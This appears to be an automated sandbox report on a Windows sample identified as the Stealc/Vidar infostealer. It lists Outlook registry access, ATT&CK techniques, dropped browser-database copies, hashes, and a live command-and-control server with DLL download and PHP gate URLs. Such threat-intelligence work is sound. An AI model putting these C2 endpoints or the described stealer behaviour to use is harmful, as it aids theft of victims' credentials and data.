Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004	Jump to behavior

Source: Yara match

File source: Process Memory Space: file.exe PID: 6104, type: MEMORYSTR

Remote Access Functionality

Yara detected Stealc

Source: Yara match	File source: 0.2.file.exe.890000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2273166717.0000000000891000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2274503696.000000000154E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2047168594.0000000005240000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 6104, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: file.exe PID: 6104, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	11 Native API	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	2 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	12 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	Boot or Logon Initialization Scripts	11 Process Injection	1 Deobfuscate/Decode Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	4 Data from Local System	2 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	3 Obfuscated Files or Information	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	12 Software Packing	NTDS	345 System Information Discovery	Distributed Component Object Model	Input Capture	112 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	651 Security Software Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Masquerading	Cached Domain Credentials	33 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	33 Virtualization/Sandbox Evasion	DCSync	13 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	11 Process Injection	Proc Filesystem	1 System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
file.exe	100%	Avira	TR/Crypt.TPM.Gen
file.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner
C:\ProgramData\freebl3.dll	0%	ReversingLabs
C:\ProgramData\mozglue.dll	0%	ReversingLabs
C:\ProgramData\msvcp140.dll	0%	ReversingLabs
C:\ProgramData\nss3.dll	0%	ReversingLabs
C:\ProgramData\softokn3.dll	0%	ReversingLabs
C:\ProgramData\vcruntime140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\freebl3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\mozglue[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\msvcp140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\nss3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\softokn3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\vcruntime140[1].dll	0%	ReversingLabs

Source	Detection	Scanner	Label
https://duckduckgo.com/chrome_newtab	0%	URL Reputation	safe
http://185.215.113.37/	100%	URL Reputation	malware
https://duckduckgo.com/ac/?q=	0%	URL Reputation	safe
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.	0%	URL Reputation	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
http://185.215.113.37	100%	URL Reputation	malware
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
http://185.215.113.37/e2b1563c6670f193.php	100%	URL Reputation	malware
http://www.sqlite.org/copyright.html.	0%	URL Reputation	safe
https://mozilla.org0/	0%	URL Reputation	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta	0%	URL Reputation	safe
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	0%	URL Reputation	safe
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg	0%	URL Reputation	safe
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	0%	URL Reputation	safe
https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL	0%	URL Reputation	safe
https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref	0%	URL Reputation	safe
https://support.mozilla.org	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe

Name	Malicious	Antivirus Detection	Reputation
http://185.215.113.37/	true	URL Reputation: malware	unknown
http://185.215.113.37/0d60be0de163924d/nss3.dll	true		unknown
http://185.215.113.37/0d60be0de163924d/mozglue.dll	true		unknown
http://185.215.113.37/0d60be0de163924d/softokn3.dll	true		unknown
http://185.215.113.37/0d60be0de163924d/vcruntime140.dll	true		unknown
http://185.215.113.37/0d60be0de163924d/freebl3.dll	true		unknown
http://185.215.113.37/e2b1563c6670f193.php	true	URL Reputation: malware	unknown
http://185.215.113.37/0d60be0de163924d/sqlite3.dll	true		unknown
http://185.215.113.37/0d60be0de163924d/msvcp140.dll	true		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	file.exe, 00000000.00000003.2120917558.0000000001603000.00000004.00000020.00020000.00000000.sdmp, GIEBGIIJ.0.dr	false	URL Reputation: safe	unknown
https://duckduckgo.com/ac/?q=	file.exe, 00000000.00000003.2120917558.0000000001603000.00000004.00000020.00020000.00000000.sdmp, GIEBGIIJ.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/0d60be0de163924d/nss3.dllw	file.exe, 00000000.00000002.2274503696.0000000001594000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi	KFCAFIIDHIDGHIECGDGI.0.dr	false		unknown
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.	file.exe, 00000000.00000002.2290554138.0000000029B8C000.00000004.00000020.00020000.00000000.sdmp, KFCAFIIDHIDGHIECGDGI.0.dr	false	URL Reputation: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	file.exe, 00000000.00000003.2120917558.0000000001603000.00000004.00000020.00020000.00000000.sdmp, GIEBGIIJ.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37	file.exe, 00000000.00000002.2273166717.0000000000A5B000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.2274503696.000000000154E000.00000004.00000020.00020000.00000000.sdmp	true	URL Reputation: malware	unknown
http://185.215.113.37H	file.exe, 00000000.00000002.2274503696.000000000154E000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.37/e2b1563c6670f193.phpl	file.exe, 00000000.00000002.2274503696.0000000001625000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.37/0d60be0de163924d/freebl3.dllo/	file.exe, 00000000.00000002.2274503696.00000000015C3000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.37/e2b1563c6670f193.php3D	file.exe, 00000000.00000002.2274503696.0000000001625000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.37e2b1563c6670f193.phption:	file.exe, 00000000.00000002.2273166717.0000000000A5B000.00000040.00000001.01000000.00000003.sdmp	true		unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	file.exe, 00000000.00000003.2120917558.0000000001603000.00000004.00000020.00020000.00000000.sdmp, GIEBGIIJ.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/e2b1563c6670f193.phption:	file.exe, 00000000.00000002.2273166717.0000000000A5B000.00000040.00000001.01000000.00000003.sdmp	true		unknown
http://185.215.113.37/e2b1563c6670f193.phpa	file.exe, 00000000.00000002.2274503696.00000000015A8000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.37/e2b1563c6670f193.phpla	file.exe, 00000000.00000002.2274503696.00000000015D0000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.37/e2b1563c6670f193.phpdll	file.exe, 00000000.00000002.2274503696.0000000001625000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.37/e2b1563c6670f193.phpc	file.exe, 00000000.00000002.2274503696.0000000001625000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://www.sqlite.org/copyright.html.	file.exe, 00000000.00000002.2285775437.000000001DAC5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2301450487.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://185.215.113.37/0d60be0de163924d/vcruntime140.dll9)	file.exe, 00000000.00000002.2274503696.00000000015C3000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://www.mozilla.com/en-US/blocklist/	file.exe, file.exe, 00000000.00000002.2301610914.000000006C6CD000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr	false		unknown
https://mozilla.org0/	freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	false	URL Reputation: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	file.exe, 00000000.00000003.2120917558.0000000001603000.00000004.00000020.00020000.00000000.sdmp, GIEBGIIJ.0.dr	false		unknown
http://185.215.113.37/e2b1563c6670f193.phpinomi	file.exe, 00000000.00000002.2274503696.00000000015D0000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	file.exe, 00000000.00000003.2120917558.0000000001603000.00000004.00000020.00020000.00000000.sdmp, GIEBGIIJ.0.dr	false	URL Reputation: safe	unknown
https://www.ecosia.org/newtab/	file.exe, 00000000.00000003.2120917558.0000000001603000.00000004.00000020.00020000.00000000.sdmp, GIEBGIIJ.0.dr	false	URL Reputation: safe	unknown
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta	file.exe, 00000000.00000002.2290554138.0000000029B8C000.00000004.00000020.00020000.00000000.sdmp, KFCAFIIDHIDGHIECGDGI.0.dr	false	URL Reputation: safe	unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	AAKEGIJEHJDGDHJKJKKJDGCAAK.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/0d60be0de163924d/sqlite3.dllY(	file.exe, 00000000.00000002.2274503696.00000000015C3000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://ac.ecosia.org/autocomplete?q=	file.exe, 00000000.00000003.2120917558.0000000001603000.00000004.00000020.00020000.00000000.sdmp, GIEBGIIJ.0.dr	false	URL Reputation: safe	unknown
https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg	file.exe, 00000000.00000002.2290554138.0000000029B8C000.00000004.00000020.00020000.00000000.sdmp, KFCAFIIDHIDGHIECGDGI.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/e2b1563c6670f193.phpdllo	file.exe, 00000000.00000002.2274503696.0000000001625000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	file.exe, 00000000.00000002.2290554138.0000000029B8C000.00000004.00000020.00020000.00000000.sdmp, KFCAFIIDHIDGHIECGDGI.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/e2b1563c6670f193.php5	file.exe, 00000000.00000002.2274503696.00000000015A8000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.37/e2b1563c6670f193.php3	file.exe, 00000000.00000002.2274503696.0000000001625000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.37/e2b1563c6670f193.php9	file.exe, 00000000.00000002.2274503696.00000000015A8000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL	AAKEGIJEHJDGDHJKJKKJDGCAAK.0.dr	false	URL Reputation: safe	unknown
https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref	file.exe, 00000000.00000002.2290554138.0000000029B8C000.00000004.00000020.00020000.00000000.sdmp, KFCAFIIDHIDGHIECGDGI.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/e2b1563c6670f193.phpwser	file.exe, 00000000.00000002.2274503696.00000000015D0000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477	file.exe, 00000000.00000002.2290554138.0000000029B8C000.00000004.00000020.00020000.00000000.sdmp, KFCAFIIDHIDGHIECGDGI.0.dr	false		unknown
https://support.mozilla.org	AAKEGIJEHJDGDHJKJKKJDGCAAK.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/e2b1563c6670f193.phpP1c	file.exe, 00000000.00000002.2274503696.0000000001625000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	file.exe, 00000000.00000003.2120917558.0000000001603000.00000004.00000020.00020000.00000000.sdmp, GIEBGIIJ.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/0d60be0de163924d/softokn3.dllk(	file.exe, 00000000.00000002.2274503696.00000000015C3000.00000004.00000020.00020000.00000000.sdmp	true		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.215.113.37	unknown	Portugal		206894	WHOLESALECONNECTIONSNL	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1524532
Start date and time:	2024-10-02 23:09:07 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 36s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	5
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@1/23@0/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 86% Number of executed functions: 79 Number of non-executed functions: 113
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: file.exe

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.215.113.37	nJohIBtNm5.exe	Get hash	malicious	LummaC, Amadey, Clipboard Hijacker, CryptOne, Cryptbot, LummaC Stealer, RedLine	Browse	185.215.113.37/e2b1563c6670f193.php
	PwjUL1lEEC.exe	Get hash	malicious	Amadey, Credential Flusher, Stealc	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37/e2b1563c6670f193.php

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
WHOLESALECONNECTIONSNL	nJohIBtNm5.exe	Get hash	malicious	LummaC, Amadey, Clipboard Hijacker, CryptOne, Cryptbot, LummaC Stealer, RedLine	Browse	185.215.113.103
	zKxfw9WFdt.exe	Get hash	malicious	Amadey	Browse	185.215.113.16
	dXDaTWHYvF.exe	Get hash	malicious	Amadey	Browse	185.215.113.43
	PwjUL1lEEC.exe	Get hash	malicious	Amadey, Credential Flusher, Stealc	Browse	185.215.113.103
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\ProgramData\freebl3.dll	nJohIBtNm5.exe	Get hash	malicious	LummaC, Amadey, Clipboard Hijacker, CryptOne, Cryptbot, LummaC Stealer, RedLine	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	66fb252fe232b_Patksl.exe	Get hash	malicious	LummaC, PrivateLoader, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, PrivateLoader, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, PrivateLoader, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
C:\ProgramData\mozglue.dll	nJohIBtNm5.exe	Get hash	malicious	LummaC, Amadey, Clipboard Hijacker, CryptOne, Cryptbot, LummaC Stealer, RedLine	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	66fb252fe232b_Patksl.exe	Get hash	malicious	LummaC, PrivateLoader, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, PrivateLoader, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, PrivateLoader, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse

Created / dropped Files

C:\ProgramData\AAKEGIJEHJDGDHJKJKKJDGCAAK

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.03859996294213402
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWHxDSjENbx56p3DisuwAyHI:58r54w0VW3xWdkEFxcp3y/y
MD5:	D2A38A463B7925FE3ABE31ECCCE66ACA
SHA1:	A1824888F9E086439B287DEA497F660F3AA4B397
SHA-256:	474361353F00E89A9ECB246EC4662682392EBAF4F2A4BE9ABB68BBEBE33FA4A0
SHA-512:	62DB46A530D952568EFBFF7796106E860D07754530B724E0392862EF76FDF99043DA9538EC0044323C814DF59802C3BB55454D591362CB9B6E39947D11E981F7
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\AEBAFBGIDHCBFHIECFCBGHIEGD

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\CGDHIEGCFHCGDGCAECBG

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	0.8746135976761988
Encrypted:	false
SSDEEP:	96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
MD5:	9E68EA772705B5EC0C83C2A97BB26324
SHA1:	243128040256A9112CEAC269D56AD6B21061FF80
SHA-256:	17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
SHA-512:	312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\GIEBGIIJ

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.136413900497188
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
MD5:	429F49156428FD53EB06FC82088FD324
SHA1:	560E48154B4611838CD4E9DF4C14D0F9840F06AF
SHA-256:	9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
SHA-512:	1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\JKJEHJKJ

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.121297215059106
Encrypted:	false
SSDEEP:	384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
MD5:	D87270D0039ED3A5A72E7082EA71E305
SHA1:	0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
SHA-256:	F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
SHA-512:	18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\KEBKJDBAAKJDGCBFHCFCGIEBFB

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.8439810553697228
Encrypted:	false
SSDEEP:	24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
MD5:	9D46F142BBCF25D0D495FF1F3A7609D3
SHA1:	629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
SHA-256:	C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
SHA-512:	AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\KFCAFIIDHIDGHIECGDGI

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with very long lines (1743), with CRLF line terminators
Category:	dropped
Size (bytes):	9504
Entropy (8bit):	5.512408163813622
Encrypted:	false
SSDEEP:	192:nnPOeRnWYbBp6RJ0aX+H6SEXKxkHWNBw8D4Sl:PeegJUaJHEw90
MD5:	1191AEB8EAFD5B2D5C29DF9B62C45278
SHA1:	584A8B78810AEE6008839EF3F1AC21FD5435B990
